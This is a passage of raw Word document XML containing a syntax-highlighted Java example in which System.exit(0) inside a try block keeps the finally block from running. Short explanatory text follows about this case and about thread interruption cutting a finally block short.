      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD67014" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C96A940" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE7CB00" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside try block"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963952C" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Terminate the JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E681D" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD040A" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside catch block"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020D5DD" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B95E25" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// This will not be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D89A2" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside finally block"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75DDAD" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5F6CF" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA7A5D" w14:textId="2283C3D1"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF310E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070987A8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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side try block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5F9E5" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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case, the System.exit(0) call causes the program to terminate before the finally block is reached, so it is ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61709311" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AA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If the thread executing the finally block is interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6DAF4" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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a finally block contains code that is being executed by a thread, and that thread is interrupted (for example, by calling Thread.interrupt()), the finally block might not complete its execution. This can happen especially when the finally block contains long-running operations, like I/O or network operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA8C13" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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02625214" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
